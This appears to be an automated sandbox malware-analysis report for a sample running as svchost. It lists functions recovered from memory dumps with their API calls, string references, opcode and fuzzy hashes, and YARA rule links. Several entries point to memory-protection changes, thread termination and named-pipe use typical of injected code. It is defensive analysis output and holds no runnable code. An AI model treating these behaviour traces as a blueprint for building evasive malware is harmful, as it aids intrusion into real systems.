API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: e8debce94c918ebd2bccc068a38c4033034fbb1ff3e4cd6db11c0c3b8dc11bd9
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 0341A433214B80E7EB61CF95E4487AEB7A1F389794F408125EB8907B58DF38C1A5CB10

Function 000002295D5369F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002295D536A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002295D536A6A
_RTC_Initialize.LIBCMT ref: 000002295D536A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002295D536ABE
__scrt_release_startup_lock.LIBCMT ref: 000002295D536AE9

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: e9bb5c31c14fc3d395f6a425828c02ffbebde6951f409e7a1fe5992b683253f2
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 4981F021704685A6FA53AFED945935962D0EF95780FD4802DFA048779EDB38C8FB8730

Function 000002295D5675F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002295D567618
__scrt_acquire_startup_lock.LIBCMT ref: 000002295D56766A
_RTC_Initialize.LIBCMT ref: 000002295D567698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002295D5676BE
__scrt_release_startup_lock.LIBCMT ref: 000002295D5676E9

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 177c773e1e7dfd8a5ed4220e107583d9124d25de35631a206f5b1d63bb2b8b62
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: AE81D021B10241A6FA629BFDB84D3596290B7457C0FD84125FA1847BAEEF38C8E7C730

Function 000002295D569804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000002295D569889
GetLastError.KERNEL32 ref: 000002295D569897
LoadLibraryExW.KERNEL32 ref: 000002295D5698C1
FreeLibrary.KERNEL32 ref: 000002295D569907
GetProcAddress.KERNEL32 ref: 000002295D569913

Strings

api-ms-, xrefs: 000002295D5698A9

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: dc85a75abc711fb33c37209140bc320e9bd677249494bd85118dde110398db05
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 7F318431312650F1FE139B9AB4087996394B749BA0F994525FE2D4B39CEF38C4E6C720

Function 000002295D571B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 000002295D571BCD
GetLastError.KERNEL32 ref: 000002295D571BD9
CloseHandle.KERNEL32 ref: 000002295D571BF1
CreateFileW.KERNEL32 ref: 000002295D571C1C
WriteConsoleW.KERNEL32 ref: 000002295D571C3B

Strings

CONOUT$, xrefs: 000002295D571BFD

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 4d72f3105d719a63821fe754c6d7dd19382ae42c4a80501f2782a2bd43ef267e
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: D611C431314B5096F7518B8AE84871977A4F388FF4FA00225FE6E87798CF38C5A58750

Function 000002295D565C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002295D565C4B
GetThreadContext.KERNEL32 ref: 000002295D565DB5

Part of subcall function 000002295D565A40: GetCurrentThreadId.KERNEL32 ref: 000002295D565A44

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: af2c629c012e9adac4229a14eacd238263cdae950b7cfdce04b58a675a87641c
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 39D18C76208B88D2DA71DB59F49835A77A0F3C8B84F540216FA8D47BA9DF3CC592CB10

Function 000002295D5630B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002295D5630D7
HeapAlloc.KERNEL32 ref: 000002295D5630EA
StrCmpNIW.SHLWAPI ref: 000002295D56316B
GetProcessHeap.KERNEL32 ref: 000002295D5631D1
HeapFree.KERNEL32 ref: 000002295D5631DF

Strings

dialer, xrefs: 000002295D563164

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 0933069cf0e1490756b4d83f88b27466ff5f6f5a4cb0ffb68886df60d643d9f4
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 9B317021701B55A2FB56DF9AE84866967A0FB46BD4F888120EF4907B58EF38C4F3C710

Function 000002295D561A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002295D561A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002295D561A58
PathFindFileNameW.SHLWAPI ref: 000002295D561A67
lstrlenW.KERNEL32 ref: 000002295D561A73
StrCpyW.SHLWAPI ref: 000002295D561A86
CloseHandle.KERNEL32 ref: 000002295D561A94

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: b77691d71fa82fd0f0c879284ef49ff13d48701d03fc163ecb9bb793dd36b294
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: A3016D31300A41A6FB11DB96A45C76963A1F788FD0F984435EE9A43768DE3CC9D6C350

Function 000002295D5637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002295D5637C8
GetCurrentProcess.KERNEL32 ref: 000002295D5637D6
VirtualProtectEx.KERNEL32 ref: 000002295D5637F8
GetCurrentProcess.KERNEL32 ref: 000002295D563819
VirtualProtectEx.KERNEL32 ref: 000002295D56383A
TerminateThread.KERNEL32 ref: 000002295D563849

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 4cbb42e127e58c53af39564505926530af553a3f5e6320148cbfec8e0bb101a7
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 73118475301741A2FB269BA9F40D75663A0BB58BD5F940428EE590775CEF3CC0AAC720

Function 000002295D5690F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002295D569103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002295D569198
RtlUnwindEx.NTDLL ref: 000002295D5691E7

Strings

csm, xrefs: 000002295D56917E
f, xrefs: 000002295D569116

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: a23fc60485f0c380312dd1d7e3229ddd13c337a1fb1e7acd51aa5a4cffb3b8c1
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: FF51B032311640EBEB16DF99F44CB593395F344B98FA08120EA164B78CEB35D9D2CB20

Function 000002295D5690D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002295D569103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002295D569198
RtlUnwindEx.NTDLL ref: 000002295D5691E7

Strings

csm, xrefs: 000002295D56917E
f, xrefs: 000002295D569116

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: f5150f63948c35c53ac81c47d062bafe7da57ac8993b4762ae4789a995be2596
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 4B319E32310680E6E716DF59F84C71937A5F748BD8FA58114FE5A0B749DB38C9A2CB24

Function 000002295D561AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002295D561AD8
StrCmpNIW.SHLWAPI ref: 000002295D561AF2
lstrlenW.KERNEL32 ref: 000002295D561B01
StrCpyW.SHLWAPI ref: 000002295D561B16

Strings

\\?\, xrefs: 000002295D561AE6

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 7fe597ed2677da22335033f5e41d13b9115a435c11a0163dc208282d719bda32
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 3DF0A422300641A2FB318BA9F4987696760F754BD8FD48020EA484A96CDE2CC6DAC710

Function 000002295D563200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002295D563222
StrCpyW.SHLWAPI ref: 000002295D563232
StrCatW.SHLWAPI ref: 000002295D56323E
PathCombineW.SHLWAPI ref: 000002295D56324C

Strings

\\.\pipe\, xrefs: 000002295D563218

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: cc02822e64b4b43800a6494ef65c193e0582d1c11f55bb9244bc4ef4555baaa7
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: D5F08260304B80A1FA118B9BF90C1196221EB48FE0F988131FF6A07B2CCE2CC4E7C310

Function 000002295D56A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002295D56A154
GetProcAddress.KERNEL32 ref: 000002295D56A16A
FreeLibrary.KERNEL32 ref: 000002295D56A187

Strings

CorExitProcess, xrefs: 000002295D56A163
mscoree.dll, xrefs: 000002295D56A14B

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 7eacd118fc183eabda9bc05fae293b562405534fa16fb932430ef6238a9dd696
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 07F01261311644B1FF578BE9F88C36923A0AB48BD1FA42019F61B45578DF38C4EAC720

Function 000002295D5651B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002295D565236

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: cfd658ea2cdb61fb7e280d60c831be61231c77804aebe3abdfbc6e827c43d649
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 5C02C932219B8096E7A1CF99F49835AB7A0F3C5B94F504115FA8E87BA8DF7CC495CB10

Function 000002295D570860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002295D5708A2
GetConsoleMode.KERNEL32 ref: 000002295D570960
GetLastError.KERNEL32 ref: 000002295D5709EA

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: d052b1c46727c19f43efd8b7e0256fe62ff6537c43c5cc0f5a60b0815a9477fd
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: DF81AC22B10650A9FB529BEDD8487AD27F0B754BD8FE44116FA0A5369ADB3484E3C330

Function 000002295D5657F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002295D565806

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 2e75c9d66f1ae270a0ccae9c8ac8bc829f1075925da208cb5abb1be85d45c1d2
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 0861BC36619B44D6E7618B99F45831A77A0F3C8784FA00116FA8D47BACDB7CC5A2CF10

Function 000002295D5412B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002295D5412E0
_set_statfp.LIBCMT ref: 000002295D5412FB
_set_statfp.LIBCMT ref: 000002295D541317
_set_statfp.LIBCMT ref: 000002295D541353

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: bba08c75069eb4ae0592ef4de81ae1046e0182a33f185f0024a95fadd8ac3b44
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: D811C622B5FE1461F66611EEE47EB6D10406B553B4FC80624FA7646FDE8B188CE34127

Function 000002295D571EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002295D571EE0
_set_statfp.LIBCMT ref: 000002295D571EFB
_set_statfp.LIBCMT ref: 000002295D571F17
_set_statfp.LIBCMT ref: 000002295D571F53

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: d00fc3ff6a8a2feef3ba3802974e7caae69bdcfd36a4a00ff7f8a0dc82fe5ffb
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: B811A922B56E0121F69A11ECE85E76910517B643F4FF46625FE77063DF8B548CE34134

Function 000002295D563878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002295D563886
GetCurrentProcess.KERNEL32 ref: 000002295D5638B4
VirtualProtectEx.KERNEL32 ref: 000002295D5638D6
GetCurrentProcess.KERNEL32 ref: 000002295D5638F4
VirtualProtectEx.KERNEL32 ref: 000002295D563915

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: d9f4ad6a2dca8628e2ea8d3bc8c82d10d9319df7426a2d87402df6b7559ee48c
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 6A118E2A705B4092FB169BA9F41836967B0F788B90F980029EF9907798EF3DC596C710

Function 000002295D5384F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002295D538503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002295D538598

Strings

csm, xrefs: 000002295D53857E
f, xrefs: 000002295D538516

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 01f5ff1fb9b5be4ee618e3ccf9128f27f383dc818439f1e97fcf397e8e08a064
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: FA51D772712600ABDB1ACF6DD448B193B95FB54B98FD18124FA164774CDB34C8E2C726

Function 000002295D5384D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002295D538503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002295D538598

Strings

csm, xrefs: 000002295D53857E
f, xrefs: 000002295D538516

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 54cef47eacf2fdafb8c6ab38e85dc36da4425aedc6f44c8e3f84c76bb3317c6d
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 9931AF72311750F6E71ADF69E8487193BA4FB40B98F958014FE5A4774CCB38C9A2C726

Function 000002295D5614B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002295D5614D5
HeapFree.KERNEL32 ref: 000002295D5614E4
GetProcessHeap.KERNEL32 ref: 000002295D5614F0
HeapFree.KERNEL32 ref: 000002295D5614FF
GetProcessHeap.KERNEL32 ref: 000002295D56152A

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: c4733d2196c257afb400b46f69818893e68172c46ec69e2d92d4166db854acf0
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: 1B118132614F84E2E751CFAAF80825A7360F78ABD0F544029EB9A03718DF38C0A2C710

Function 000002295D5626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002295D5627D4
StrCpyW.SHLWAPI ref: 000002295D5627ED

Strings

\\.\pipe\, xrefs: 000002295D5627DF

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: a24aa7111778482f37dc46ad5fb1c8f263fadef3bef945fd79dc8ec058fcd767
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 8071E33230078162EB669FADA9583AE6790F785BC4FC44026FE4943B8DDE34C9E6C710

Function 000002295D5624DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002295D5625C3
StrCpyW.SHLWAPI ref: 000002295D5625DA

Strings

\\.\pipe\, xrefs: 000002295D5625CE

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: bd4259202f19020f7acc39bfef5f09d3a58e72965e4eacd60525bfbc4f07c94f
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 00511A3230478162FA369EADB15C3AA6651F385784FD40025FF9A07B9DDE35C4A7CB60

Function 000002295D570604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002295D57071B
GetLastError.KERNEL32 ref: 000002295D57073D

Strings

U, xrefs: 000002295D5706C7

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 1165dc7b861e08b73f9ddd0575140fde1ab06b2083633807e1a2c32ed641343a
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: BD41A372314A80A5EB619F6DE4593AAA7A0F3887D4F904025FE4D87798EF3CC592CB50

Function 000002295D56D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002295D56D6F9
LCMapStringW.KERNEL32 ref: 000002295D56D781

Strings

LCMapStringEx, xrefs: 000002295D56D6DC, 000002295D56D6ED

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
